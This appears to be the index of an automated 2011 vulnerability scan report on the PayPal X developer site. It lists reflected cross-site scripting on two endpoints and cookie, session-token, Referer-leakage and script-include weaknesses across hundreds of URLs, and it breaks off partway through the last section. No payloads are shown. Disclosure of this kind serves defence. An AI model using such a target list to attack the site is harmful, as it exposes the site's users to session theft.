XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, x.com

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Fri Aug 12 09:27:09 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


1. Cross-site scripting (reflected)

1.1. https://www.x.com/blogs/ [name of an arbitrarily supplied request parameter]

1.2. https://www.x.com/community/ppx/xspaces/introduce [name of an arbitrarily supplied request parameter]

2. SSL cookie without secure flag set

2.1. https://www.x.com/

2.2. https://www.x.com/blogs/josh/2011/03/29/paypal-integration-resources

2.3. https://www.x.com/blogs/matt/2010/08/10/retrieving-your-api-credentials

2.4. https://www.x.com/community/home

2.5. https://www.x.com/community/ppx

2.6. https://www.x.com/community/ppx/adaptive_accounts

2.7. https://www.x.com/community/ppx/adaptive_payments

2.8. https://www.x.com/community/ppx/apps101

2.9. https://www.x.com/community/ppx/authentication

2.10. https://www.x.com/community/ppx/businesspayments

2.11. https://www.x.com/community/ppx/button_manager

2.12. https://www.x.com/community/ppx/code_samples

2.13. https://www.x.com/community/ppx/dev-tools

2.14. https://www.x.com/community/ppx/dev-tools/decision_tree

2.15. https://www.x.com/community/ppx/devchallenge

2.16. https://www.x.com/community/ppx/devchallenge/

2.17. https://www.x.com/community/ppx/developer

2.18. https://www.x.com/community/ppx/devtalk

2.19. https://www.x.com/community/ppx/devzone

2.20. https://www.x.com/community/ppx/documentation

2.21. https://www.x.com/community/ppx/ec

2.22. https://www.x.com/community/ppx/feedback

2.23. https://www.x.com/community/ppx/fundraising

2.24. https://www.x.com/community/ppx/global

2.25. https://www.x.com/community/ppx/global/au

2.26. https://www.x.com/community/ppx/global/ca

2.27. https://www.x.com/community/ppx/global/cn

2.28. https://www.x.com/community/ppx/global/de

2.29. https://www.x.com/community/ppx/global/fr

2.30. https://www.x.com/community/ppx/global/it

2.31. https://www.x.com/community/ppx/global/jp

2.32. https://www.x.com/community/ppx/global/mx

2.33. https://www.x.com/community/ppx/global/nl

2.34. https://www.x.com/community/ppx/global/sp

2.35. https://www.x.com/community/ppx/global/uk

2.36. https://www.x.com/community/ppx/ipn

2.37. https://www.x.com/community/ppx/marketplaces

2.38. https://www.x.com/community/ppx/mass_pay

2.39. https://www.x.com/community/ppx/offlineanddevices

2.40. https://www.x.com/community/ppx/p2p

2.41. https://www.x.com/community/ppx/payflow_link

2.42. https://www.x.com/community/ppx/payflow_pro

2.43. https://www.x.com/community/ppx/payflow_xml_reporting

2.44. https://www.x.com/community/ppx/pdt

2.45. https://www.x.com/community/ppx/permissions

2.46. https://www.x.com/community/ppx/press

2.47. https://www.x.com/community/ppx/recurring_billing

2.48. https://www.x.com/community/ppx/recurring_payments

2.49. https://www.x.com/community/ppx/release_notes

2.50. https://www.x.com/community/ppx/sdks

2.51. https://www.x.com/community/ppx/showcase

2.52. https://www.x.com/community/ppx/showcase/ap_directory

2.53. https://www.x.com/community/ppx/support

2.54. https://www.x.com/community/ppx/system_status

2.55. https://www.x.com/community/ppx/testing

2.56. https://www.x.com/community/ppx/training

2.57. https://www.x.com/community/ppx/transaction_information

2.58. https://www.x.com/community/ppx/vt

2.59. https://www.x.com/community/ppx/website_reporting

2.60. https://www.x.com/community/ppx/wpp

2.61. https://www.x.com/community/ppx/wpphosted

2.62. https://www.x.com/community/ppx/wps

2.63. https://www.x.com/community/ppx/xspaces

2.64. https://www.x.com/community/ppx/xspaces/accelerator

2.65. https://www.x.com/community/ppx/xspaces/certification

2.66. https://www.x.com/community/ppx/xspaces/cloud-computing

2.67. https://www.x.com/community/ppx/xspaces/digital_goods

2.68. https://www.x.com/community/ppx/xspaces/finance

2.69. https://www.x.com/community/ppx/xspaces/forums

2.70. https://www.x.com/community/ppx/xspaces/gaming

2.71. https://www.x.com/community/ppx/xspaces/identity

2.72. https://www.x.com/community/ppx/xspaces/innovate

2.73. https://www.x.com/community/ppx/xspaces/introduce

2.74. https://www.x.com/community/ppx/xspaces/mobile

2.75. https://www.x.com/community/ppx/xspaces/mobile/mecl

2.76. https://www.x.com/community/ppx/xspaces/mobile/mobile_ec

2.77. https://www.x.com/community/ppx/xspaces/security

2.78. https://www.x.com/community/ppx/xspaces/social

2.79. https://www.x.com/community/ppx/xspaces/subscriptions

2.80. https://www.x.com/community/ppx/xspaces/toolkits

2.81. https://www.x.com/community/ppx/xspaces/web_checkout

2.82. https://www.x.com/community/ppx/xspaces/web_checkout/nvp

2.83. https://www.x.com/community/ppx/xspaces/web_checkout/soap

2.84. https://www.x.com/community/xcommerce-blogs

2.85. https://www.x.com/community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

2.86. https://www.x.com/community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

2.87. https://www.x.com/community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

2.88. https://www.x.com/community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

2.89. https://www.x.com/community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

2.90. https://www.x.com/community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

2.91. https://www.x.com/community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

2.92. https://www.x.com/docs/DOC-1031

2.93. https://www.x.com/docs/DOC-1041

2.94. https://www.x.com/docs/DOC-1051

2.95. https://www.x.com/docs/DOC-1106

2.96. https://www.x.com/docs/DOC-1108

2.97. https://www.x.com/docs/DOC-1116

2.98. https://www.x.com/docs/DOC-1176

2.99. https://www.x.com/docs/DOC-1204

2.100. https://www.x.com/docs/DOC-1216

2.101. https://www.x.com/docs/DOC-1332

2.102. https://www.x.com/docs/DOC-1372

2.103. https://www.x.com/docs/DOC-1374

2.104. https://www.x.com/docs/DOC-1401

2.105. https://www.x.com/docs/DOC-1431

2.106. https://www.x.com/docs/DOC-1551

2.107. https://www.x.com/docs/DOC-1613

2.108. https://www.x.com/docs/DOC-2241

2.109. https://www.x.com/docs/DOC-2346

2.110. https://www.x.com/docs/DOC-3201

2.111. https://www.x.com/docs/DOC-3212

2.112. https://www.x.com/docs/DOC-3251

2.113. https://www.x.com/docs/DOC-3271

2.114. https://www.x.com/docs/DOC-3321

2.115. https://www.x.com/docs/DOC-3322

2.116. https://www.x.com/docs/DOC-3323

2.117. https://www.x.com/docs/DOC-3345

2.118. https://www.x.com/docs/DOC-3351

2.119. https://www.x.com/docs/DOC-3352

2.120. https://www.x.com/docs/DOC-3353

2.121. https://www.x.com/docs/DOC-3354

2.122. https://www.x.com/docs/DOC-3355

2.123. https://www.x.com/docs/DOC-3371

2.124. https://www.x.com/docs/DOC-3372

2.125. https://www.x.com/docs/DOC-3373

2.126. https://www.x.com/docs/DOC-3374

2.127. https://www.x.com/docs/DOC-3375

2.128. https://www.x.com/docs/DOC-3426

2.129. https://www.x.com/docs/DOC-3427

2.130. https://www.x.com/docs/DOC-3431

2.131. https://www.x.com/docs/DOC-3443

2.132. https://www.x.com/docs/DOC-3444

2.133. https://www.x.com/docs/DOC-3491

2.134. https://www.x.com/docs/DOC-3561

2.135. https://www.x.com/docs/DOC-3562

2.136. https://www.x.com/docs/DOC-3619

2.137. https://www.x.com/docs/DOC-3688

2.138. https://www.x.com/docs/DOC-3811

2.139. https://www.x.com/docs/DOC-3812

2.140. https://www.x.com/docs/DOC-3836

2.141. https://www.x.com/docs/DOC-3841

2.142. https://www.x.com/message/186684

2.143. https://www.x.com/message/198017

2.144. https://www.x.com/message/211333

2.145. https://www.x.com/message/211439

2.146. https://www.x.com/message/211738

2.147. https://www.x.com/message/212001

2.148. https://www.x.com/message/212124

2.149. https://www.x.com/message/212170

2.150. https://www.x.com/message/212753

2.151. https://www.x.com/message/212906

2.152. https://www.x.com/message/213354

2.153. https://www.x.com/message/213546

2.154. https://www.x.com/message/213568

2.155. https://www.x.com/message/213571

2.156. https://www.x.com/message/213767

2.157. https://www.x.com/message/213787

2.158. https://www.x.com/message/213788

2.159. https://www.x.com/message/213865

2.160. https://www.x.com/message/214347

2.161. https://www.x.com/message/214440

2.162. https://www.x.com/message/214618

2.163. https://www.x.com/message/214902

2.164. https://www.x.com/message/214926

2.165. https://www.x.com/message/215245

2.166. https://www.x.com/message/215254

2.167. https://www.x.com/message/215264

2.168. https://www.x.com/message/215276

2.169. https://www.x.com/message/215291

2.170. https://www.x.com/people/BaldGeek

2.171. https://www.x.com/people/CorinneSherman

2.172. https://www.x.com/people/GiancarloUk2

2.173. https://www.x.com/people/IndieReign

2.174. https://www.x.com/people/JasonVenner

2.175. https://www.x.com/people/MrcheckAPX

2.176. https://www.x.com/people/PP_Igor

2.177. https://www.x.com/people/PP_MTS_Andre

2.178. https://www.x.com/people/PP_MTS_Chad

2.179. https://www.x.com/people/PP_MTS_GuidoT

2.180. https://www.x.com/people/PP_MTS_Magarvin

2.181. https://www.x.com/people/PP_MTS_Patrick

2.182. https://www.x.com/people/PayPalXadmin

2.183. https://www.x.com/people/PayPal_Carolyn

2.184. https://www.x.com/people/PayPal_Sudha

2.185. https://www.x.com/people/PayPal_ToddS

2.186. https://www.x.com/people/Praveen

2.187. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

2.188. https://www.x.com/people/RightWayMail

2.189. https://www.x.com/people/S.Aijaz

2.190. https://www.x.com/people/SRS

2.191. https://www.x.com/people/Saleem

2.192. https://www.x.com/people/Shade8934

2.193. https://www.x.com/people/Suneetha

2.194. https://www.x.com/people/admin

2.195. https://www.x.com/people/amypiazza00

2.196. https://www.x.com/people/angelleye

2.197. https://www.x.com/people/billday

2.198. https://www.x.com/people/blingnation2010

2.199. https://www.x.com/people/bryngregory

2.200. https://www.x.com/people/das_licht

2.201. https://www.x.com/people/dchankhour

2.202. https://www.x.com/people/eferreira

2.203. https://www.x.com/people/encore

2.204. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

2.205. https://www.x.com/people/gazugafan

2.206. https://www.x.com/people/gem

2.207. https://www.x.com/people/gogoeric

2.208. https://www.x.com/people/hotellina

2.209. https://www.x.com/people/iConcessionStand

2.210. https://www.x.com/people/joncas

2.211. https://www.x.com/people/lwhite2104

2.212. https://www.x.com/people/mandeheritage

2.213. https://www.x.com/people/odeskdev

2.214. https://www.x.com/people/omuleanu

2.215. https://www.x.com/people/pluto26

2.216. https://www.x.com/people/posiden5665

2.217. https://www.x.com/people/ramonmorales123

2.218. https://www.x.com/people/rizkygarut

2.219. https://www.x.com/people/roguereptile

2.220. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

2.221. https://www.x.com/people/sebastian.kopp@wooga.com

2.222. https://www.x.com/people/skier

3. Session token in URL

3.1. https://www.x.com/images/transparent.png

3.2. https://www.x.com/index.jspa

3.3. https://www.x.com/login.jspa

3.4. https://www.x.com/people/Bill_at_Repaid.com/avatar

3.5. https://www.x.com/people/DaveLeWave/avatar

3.6. https://www.x.com/people/Jareth_2005/avatar

3.7. https://www.x.com/people/Maxatnes/avatar

3.8. https://www.x.com/people/Murugesh_cit/avatar

3.9. https://www.x.com/people/NetGuy/avatar

3.10. https://www.x.com/people/PP_MTS_Chad/avatar

3.11. https://www.x.com/people/PP_MTS_Magarvin/avatar

3.12. https://www.x.com/people/Saveby/avatar

3.13. https://www.x.com/people/TrainingPal/avatar

3.14. https://www.x.com/people/WebBusinessDeveloper/avatar

3.15. https://www.x.com/people/advance-software/avatar

3.16. https://www.x.com/people/alfrednutile/avatar

3.17. https://www.x.com/people/appcode/avatar

3.18. https://www.x.com/people/cariad/avatar

3.19. https://www.x.com/people/christiancrest/avatar

3.20. https://www.x.com/people/ezimerchant/avatar

3.21. https://www.x.com/people/inhouse/avatar

3.22. https://www.x.com/people/jameshill/avatar

3.23. https://www.x.com/people/judemichael2001/avatar

3.24. https://www.x.com/people/lilbugclothing/avatar

3.25. https://www.x.com/people/lovelycar8888/avatar

3.26. https://www.x.com/people/lurobertson/avatar

3.27. https://www.x.com/people/mbtmobile/avatar

3.28. https://www.x.com/people/michaelcaplan/avatar

3.29. https://www.x.com/people/mikertjones/avatar

3.30. https://www.x.com/people/moneygun/avatar

3.31. https://www.x.com/people/pdumas/avatar

3.32. https://www.x.com/people/structuralartistry/avatar

3.33. https://www.x.com/people/theatreus/avatar

3.34. https://www.x.com/people/thomlizpa/avatar

3.35. https://www.x.com/people/tifroz/avatar

3.36. https://www.x.com/people/tim_hunt/avatar

3.37. https://www.x.com/people/timneu22/avatar

3.38. https://www.x.com/people/vmchatt/avatar

3.39. https://www.x.com/people/xavijr/avatar

3.40. https://www.x.com/plugins/app-type-plugin/styles/app.css

3.41. https://www.x.com/plugins/borderless-widget-plugin/classes/borderless-widget.css

3.42. https://www.x.com/plugins/content-widgets/classes/community-widget.css

3.43. https://www.x.com/plugins/digg-style-voting/scripts/plugin.js

3.44. https://www.x.com/plugins/digg-style-voting/styles/plugin.css

3.45. https://www.x.com/plugins/i18n-html-widget-plugin/classes/borderless-widget.css

3.46. https://www.x.com/plugins/idea-type-plugin/resources/styles/idea.css

3.47. https://www.x.com/resources/images/status/statusicon-01.gif

3.48. https://www.x.com/resources/scripts/fancyzoom/images/

3.49. https://www.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

3.50. https://www.x.com/resources/scripts/gen/5542325f4f5def5174140ea38a0251ad.js

3.51. https://www.x.com/styles/jive-community.css

3.52. https://www.x.com/styles/jive-videomodule.css

3.53. https://www.x.com/themes/paypal/images/favicon.ico

3.54. https://www.x.com/themes/paypal/images/favicon.png

3.55. https://www.x.com/themes/paypal/images/paypal_x_group_logo.png

3.56. https://www.x.com/themes/paypal/js/custom.js

4. Cookie without HttpOnly flag set

4.1. https://www.x.com/

4.2. https://www.x.com/blogs/josh/2011/03/29/paypal-integration-resources

4.3. https://www.x.com/blogs/matt/2010/08/10/retrieving-your-api-credentials

4.4. https://www.x.com/community/home

4.5. https://www.x.com/community/ppx

4.6. https://www.x.com/community/ppx/adaptive_accounts

4.7. https://www.x.com/community/ppx/adaptive_payments

4.8. https://www.x.com/community/ppx/apps101

4.9. https://www.x.com/community/ppx/authentication

4.10. https://www.x.com/community/ppx/businesspayments

4.11. https://www.x.com/community/ppx/button_manager

4.12. https://www.x.com/community/ppx/code_samples

4.13. https://www.x.com/community/ppx/dev-tools

4.14. https://www.x.com/community/ppx/dev-tools/decision_tree

4.15. https://www.x.com/community/ppx/devchallenge

4.16. https://www.x.com/community/ppx/devchallenge/

4.17. https://www.x.com/community/ppx/developer

4.18. https://www.x.com/community/ppx/devtalk

4.19. https://www.x.com/community/ppx/devzone

4.20. https://www.x.com/community/ppx/documentation

4.21. https://www.x.com/community/ppx/ec

4.22. https://www.x.com/community/ppx/feedback

4.23. https://www.x.com/community/ppx/fundraising

4.24. https://www.x.com/community/ppx/global

4.25. https://www.x.com/community/ppx/global/au

4.26. https://www.x.com/community/ppx/global/ca

4.27. https://www.x.com/community/ppx/global/cn

4.28. https://www.x.com/community/ppx/global/de

4.29. https://www.x.com/community/ppx/global/fr

4.30. https://www.x.com/community/ppx/global/it

4.31. https://www.x.com/community/ppx/global/jp

4.32. https://www.x.com/community/ppx/global/mx

4.33. https://www.x.com/community/ppx/global/nl

4.34. https://www.x.com/community/ppx/global/sp

4.35. https://www.x.com/community/ppx/global/uk

4.36. https://www.x.com/community/ppx/ipn

4.37. https://www.x.com/community/ppx/marketplaces

4.38. https://www.x.com/community/ppx/mass_pay

4.39. https://www.x.com/community/ppx/offlineanddevices

4.40. https://www.x.com/community/ppx/p2p

4.41. https://www.x.com/community/ppx/payflow_link

4.42. https://www.x.com/community/ppx/payflow_pro

4.43. https://www.x.com/community/ppx/payflow_xml_reporting

4.44. https://www.x.com/community/ppx/pdt

4.45. https://www.x.com/community/ppx/permissions

4.46. https://www.x.com/community/ppx/press

4.47. https://www.x.com/community/ppx/recurring_billing

4.48. https://www.x.com/community/ppx/recurring_payments

4.49. https://www.x.com/community/ppx/release_notes

4.50. https://www.x.com/community/ppx/sdks

4.51. https://www.x.com/community/ppx/showcase

4.52. https://www.x.com/community/ppx/showcase/ap_directory

4.53. https://www.x.com/community/ppx/support

4.54. https://www.x.com/community/ppx/system_status

4.55. https://www.x.com/community/ppx/testing

4.56. https://www.x.com/community/ppx/training

4.57. https://www.x.com/community/ppx/transaction_information

4.58. https://www.x.com/community/ppx/vt

4.59. https://www.x.com/community/ppx/website_reporting

4.60. https://www.x.com/community/ppx/wpp

4.61. https://www.x.com/community/ppx/wpphosted

4.62. https://www.x.com/community/ppx/wps

4.63. https://www.x.com/community/ppx/xspaces

4.64. https://www.x.com/community/ppx/xspaces/accelerator

4.65. https://www.x.com/community/ppx/xspaces/certification

4.66. https://www.x.com/community/ppx/xspaces/cloud-computing

4.67. https://www.x.com/community/ppx/xspaces/digital_goods

4.68. https://www.x.com/community/ppx/xspaces/finance

4.69. https://www.x.com/community/ppx/xspaces/forums

4.70. https://www.x.com/community/ppx/xspaces/gaming

4.71. https://www.x.com/community/ppx/xspaces/identity

4.72. https://www.x.com/community/ppx/xspaces/innovate

4.73. https://www.x.com/community/ppx/xspaces/introduce

4.74. https://www.x.com/community/ppx/xspaces/mobile

4.75. https://www.x.com/community/ppx/xspaces/mobile/mecl

4.76. https://www.x.com/community/ppx/xspaces/mobile/mobile_ec

4.77. https://www.x.com/community/ppx/xspaces/security

4.78. https://www.x.com/community/ppx/xspaces/social

4.79. https://www.x.com/community/ppx/xspaces/subscriptions

4.80. https://www.x.com/community/ppx/xspaces/toolkits

4.81. https://www.x.com/community/ppx/xspaces/web_checkout

4.82. https://www.x.com/community/ppx/xspaces/web_checkout/nvp

4.83. https://www.x.com/community/ppx/xspaces/web_checkout/soap

4.84. https://www.x.com/community/xcommerce-blogs

4.85. https://www.x.com/community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

4.86. https://www.x.com/community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

4.87. https://www.x.com/community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

4.88. https://www.x.com/community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

4.89. https://www.x.com/community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

4.90. https://www.x.com/community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

4.91. https://www.x.com/community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

4.92. https://www.x.com/docs/DOC-1031

4.93. https://www.x.com/docs/DOC-1041

4.94. https://www.x.com/docs/DOC-1051

4.95. https://www.x.com/docs/DOC-1106

4.96. https://www.x.com/docs/DOC-1108

4.97. https://www.x.com/docs/DOC-1116

4.98. https://www.x.com/docs/DOC-1176

4.99. https://www.x.com/docs/DOC-1204

4.100. https://www.x.com/docs/DOC-1216

4.101. https://www.x.com/docs/DOC-1332

4.102. https://www.x.com/docs/DOC-1372

4.103. https://www.x.com/docs/DOC-1374

4.104. https://www.x.com/docs/DOC-1401

4.105. https://www.x.com/docs/DOC-1431

4.106. https://www.x.com/docs/DOC-1551

4.107. https://www.x.com/docs/DOC-1613

4.108. https://www.x.com/docs/DOC-2241

4.109. https://www.x.com/docs/DOC-2346

4.110. https://www.x.com/docs/DOC-3201

4.111. https://www.x.com/docs/DOC-3212

4.112. https://www.x.com/docs/DOC-3251

4.113. https://www.x.com/docs/DOC-3271

4.114. https://www.x.com/docs/DOC-3321

4.115. https://www.x.com/docs/DOC-3322

4.116. https://www.x.com/docs/DOC-3323

4.117. https://www.x.com/docs/DOC-3345

4.118. https://www.x.com/docs/DOC-3351

4.119. https://www.x.com/docs/DOC-3352

4.120. https://www.x.com/docs/DOC-3353

4.121. https://www.x.com/docs/DOC-3354

4.122. https://www.x.com/docs/DOC-3355

4.123. https://www.x.com/docs/DOC-3371

4.124. https://www.x.com/docs/DOC-3372

4.125. https://www.x.com/docs/DOC-3373

4.126. https://www.x.com/docs/DOC-3374

4.127. https://www.x.com/docs/DOC-3375

4.128. https://www.x.com/docs/DOC-3426

4.129. https://www.x.com/docs/DOC-3427

4.130. https://www.x.com/docs/DOC-3431

4.131. https://www.x.com/docs/DOC-3443

4.132. https://www.x.com/docs/DOC-3444

4.133. https://www.x.com/docs/DOC-3491

4.134. https://www.x.com/docs/DOC-3561

4.135. https://www.x.com/docs/DOC-3562

4.136. https://www.x.com/docs/DOC-3619

4.137. https://www.x.com/docs/DOC-3688

4.138. https://www.x.com/docs/DOC-3811

4.139. https://www.x.com/docs/DOC-3812

4.140. https://www.x.com/docs/DOC-3836

4.141. https://www.x.com/docs/DOC-3841

4.142. https://www.x.com/message/186684

4.143. https://www.x.com/message/198017

4.144. https://www.x.com/message/211333

4.145. https://www.x.com/message/211439

4.146. https://www.x.com/message/211738

4.147. https://www.x.com/message/212001

4.148. https://www.x.com/message/212124

4.149. https://www.x.com/message/212170

4.150. https://www.x.com/message/212753

4.151. https://www.x.com/message/212906

4.152. https://www.x.com/message/213354

4.153. https://www.x.com/message/213546

4.154. https://www.x.com/message/213568

4.155. https://www.x.com/message/213571

4.156. https://www.x.com/message/213767

4.157. https://www.x.com/message/213787

4.158. https://www.x.com/message/213788

4.159. https://www.x.com/message/213865

4.160. https://www.x.com/message/214347

4.161. https://www.x.com/message/214440

4.162. https://www.x.com/message/214618

4.163. https://www.x.com/message/214902

4.164. https://www.x.com/message/214926

4.165. https://www.x.com/message/215245

4.166. https://www.x.com/message/215254

4.167. https://www.x.com/message/215264

4.168. https://www.x.com/message/215276

4.169. https://www.x.com/message/215291

4.170. https://www.x.com/people/BaldGeek

4.171. https://www.x.com/people/CorinneSherman

4.172. https://www.x.com/people/GiancarloUk2

4.173. https://www.x.com/people/IndieReign

4.174. https://www.x.com/people/JasonVenner

4.175. https://www.x.com/people/MrcheckAPX

4.176. https://www.x.com/people/PP_Igor

4.177. https://www.x.com/people/PP_MTS_Andre

4.178. https://www.x.com/people/PP_MTS_Chad

4.179. https://www.x.com/people/PP_MTS_GuidoT

4.180. https://www.x.com/people/PP_MTS_Magarvin

4.181. https://www.x.com/people/PP_MTS_Patrick

4.182. https://www.x.com/people/PayPalXadmin

4.183. https://www.x.com/people/PayPal_Carolyn

4.184. https://www.x.com/people/PayPal_Sudha

4.185. https://www.x.com/people/PayPal_ToddS

4.186. https://www.x.com/people/Praveen

4.187. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

4.188. https://www.x.com/people/RightWayMail

4.189. https://www.x.com/people/S.Aijaz

4.190. https://www.x.com/people/SRS

4.191. https://www.x.com/people/Saleem

4.192. https://www.x.com/people/Shade8934

4.193. https://www.x.com/people/Suneetha

4.194. https://www.x.com/people/admin

4.195. https://www.x.com/people/amypiazza00

4.196. https://www.x.com/people/angelleye

4.197. https://www.x.com/people/billday

4.198. https://www.x.com/people/blingnation2010

4.199. https://www.x.com/people/bryngregory

4.200. https://www.x.com/people/das_licht

4.201. https://www.x.com/people/dchankhour

4.202. https://www.x.com/people/eferreira

4.203. https://www.x.com/people/encore

4.204. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

4.205. https://www.x.com/people/gazugafan

4.206. https://www.x.com/people/gem

4.207. https://www.x.com/people/gogoeric

4.208. https://www.x.com/people/hotellina

4.209. https://www.x.com/people/iConcessionStand

4.210. https://www.x.com/people/joncas

4.211. https://www.x.com/people/lwhite2104

4.212. https://www.x.com/people/mandeheritage

4.213. https://www.x.com/people/odeskdev

4.214. https://www.x.com/people/omuleanu

4.215. https://www.x.com/people/pluto26

4.216. https://www.x.com/people/posiden5665

4.217. https://www.x.com/people/ramonmorales123

4.218. https://www.x.com/people/rizkygarut

4.219. https://www.x.com/people/roguereptile

4.220. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

4.221. https://www.x.com/people/sebastian.kopp@wooga.com

4.222. https://www.x.com/people/skier

5. Source code disclosure

5.1. https://www.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

5.2. https://www.x.com/resources/scripts/gen/0f8d77797a32adc104814eaff10722a0.js

5.3. https://www.x.com/resources/scripts/gen/45658bd430e6cc0d6bfb5e49ad19ad72.js

5.4. https://www.x.com/resources/scripts/gen/5e8daa65eff08c12130590779b690338.js

5.5. https://www.x.com/resources/scripts/gen/765a2586e97f57ed78f41f85e9e04f27.js

5.6. https://www.x.com/resources/scripts/gen/912eca7a559d6800dd49c65b5a8a3f0d.js

5.7. https://www.x.com/themes/paypal/js/custom.js

6. Cross-domain Referer leakage

6.1. https://www.x.com/community/feeds

6.2. https://www.x.com/community/ppx

6.3. https://www.x.com/community/ppx/button_manager

6.4. https://www.x.com/community/ppx/dev-tools

6.5. https://www.x.com/community/ppx/developer

6.6. https://www.x.com/community/ppx/ec

6.7. https://www.x.com/community/ppx/global

6.8. https://www.x.com/community/ppx/showcase

6.9. https://www.x.com/community/ppx/xspaces

6.10. https://www.x.com/community/ppx/xspaces/accelerator

6.11. https://www.x.com/community/ppx/xspaces/certification

6.12. https://www.x.com/community/ppx/xspaces/cloud-computing

6.13. https://www.x.com/community/ppx/xspaces/digital_goods

6.14. https://www.x.com/community/ppx/xspaces/finance

6.15. https://www.x.com/community/ppx/xspaces/forums

6.16. https://www.x.com/community/ppx/xspaces/gaming

6.17. https://www.x.com/community/ppx/xspaces/identity

6.18. https://www.x.com/community/ppx/xspaces/innovate

6.19. https://www.x.com/community/ppx/xspaces/introduce

6.20. https://www.x.com/community/ppx/xspaces/mobile

6.21. https://www.x.com/community/ppx/xspaces/security

6.22. https://www.x.com/community/ppx/xspaces/social

6.23. https://www.x.com/community/ppx/xspaces/subscriptions

6.24. https://www.x.com/community/ppx/xspaces/web_checkout

6.25. https://www.x.com/community/ppx/xspaces/web_checkout/nvp

6.26. https://www.x.com/community/xcommerce-blogs

6.27. https://www.x.com/docs/DOC-1106

6.28. https://www.x.com/index.jspa

6.29. https://www.x.com/people

6.30. https://www.x.com/people/BaldGeek

6.31. https://www.x.com/tags

7. Cross-domain script include

7.1. https://www.x.com/blogs/

7.2. https://www.x.com/blogs/josh/2011/03/29/paypal-integration-resources

7.3. https://www.x.com/blogs/matt/2010/08/10/retrieving-your-api-credentials

7.4. https://www.x.com/bookmarks/

7.5. https://www.x.com/community/

7.6. https://www.x.com/community/emailPasswordToken!input.jspa

7.7. https://www.x.com/community/feeds

7.8. https://www.x.com/community/home

7.9. https://www.x.com/community/ppx

7.10. https://www.x.com/community/ppx/adaptive_accounts

7.11. https://www.x.com/community/ppx/adaptive_payments

7.12. https://www.x.com/community/ppx/apps101

7.13. https://www.x.com/community/ppx/authentication

7.14. https://www.x.com/community/ppx/businesspayments

7.15. https://www.x.com/community/ppx/button_manager

7.16. https://www.x.com/community/ppx/code_samples

7.17. https://www.x.com/community/ppx/dev-tools

7.18. https://www.x.com/community/ppx/dev-tools/decision_tree

7.19. https://www.x.com/community/ppx/devchallenge

7.20. https://www.x.com/community/ppx/devchallenge/

7.21. https://www.x.com/community/ppx/developer

7.22. https://www.x.com/community/ppx/devtalk

7.23. https://www.x.com/community/ppx/devzone

7.24. https://www.x.com/community/ppx/documentation

7.25. https://www.x.com/community/ppx/ec

7.26. https://www.x.com/community/ppx/emailPasswordToken!input.jspa

7.27. https://www.x.com/community/ppx/feedback

7.28. https://www.x.com/community/ppx/fundraising

7.29. https://www.x.com/community/ppx/global

7.30. https://www.x.com/community/ppx/global/au

7.31. https://www.x.com/community/ppx/global/ca

7.32. https://www.x.com/community/ppx/global/cn

7.33. https://www.x.com/community/ppx/global/de

7.34. https://www.x.com/community/ppx/global/fr

7.35. https://www.x.com/community/ppx/global/it

7.36. https://www.x.com/community/ppx/global/jp

7.37. https://www.x.com/community/ppx/global/mx

7.38. https://www.x.com/community/ppx/global/nl

7.39. https://www.x.com/community/ppx/global/sp

7.40. https://www.x.com/community/ppx/global/uk

7.41. https://www.x.com/community/ppx/ipn

7.42. https://www.x.com/community/ppx/marketplaces

7.43. https://www.x.com/community/ppx/mass_pay

7.44. https://www.x.com/community/ppx/offlineanddevices

7.45. https://www.x.com/community/ppx/p2p

7.46. https://www.x.com/community/ppx/payflow_link

7.47. https://www.x.com/community/ppx/payflow_pro

7.48. https://www.x.com/community/ppx/payflow_xml_reporting

7.49. https://www.x.com/community/ppx/pdt

7.50. https://www.x.com/community/ppx/permissions

7.51. https://www.x.com/community/ppx/press

7.52. https://www.x.com/community/ppx/recurring_billing

7.53. https://www.x.com/community/ppx/recurring_payments

7.54. https://www.x.com/community/ppx/release_notes

7.55. https://www.x.com/community/ppx/sdks

7.56. https://www.x.com/community/ppx/showcase

7.57. https://www.x.com/community/ppx/showcase/ap_directory

7.58. https://www.x.com/community/ppx/support

7.59. https://www.x.com/community/ppx/system_status

7.60. https://www.x.com/community/ppx/testing

7.61. https://www.x.com/community/ppx/training

7.62. https://www.x.com/community/ppx/transaction_information

7.63. https://www.x.com/community/ppx/vt

7.64. https://www.x.com/community/ppx/website_reporting

7.65. https://www.x.com/community/ppx/wpp

7.66. https://www.x.com/community/ppx/wpphosted

7.67. https://www.x.com/community/ppx/wps

7.68. https://www.x.com/community/ppx/xspaces

7.69. https://www.x.com/community/ppx/xspaces/accelerator

7.70. https://www.x.com/community/ppx/xspaces/certification

7.71. https://www.x.com/community/ppx/xspaces/cloud-computing

